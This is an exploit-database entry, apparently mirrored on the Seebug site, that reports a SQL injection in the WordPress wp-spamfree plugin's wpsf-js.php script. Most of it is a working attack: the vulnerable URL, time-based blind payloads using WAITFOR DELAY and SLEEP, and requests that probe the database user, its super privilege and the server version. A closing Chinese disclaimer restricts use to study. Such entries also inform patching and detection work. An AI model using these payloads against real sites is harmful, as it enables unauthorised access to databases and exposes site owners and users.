#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection] #Date: 2011-09-25 #Author: [cheki] #Version:[3.2.1] #Tested on:[linux] #Used: ["sqlmap"] #SQL Injection http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1 #Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5) #[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER() #http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) #http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6) #Home page: http://hacking.ge/
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论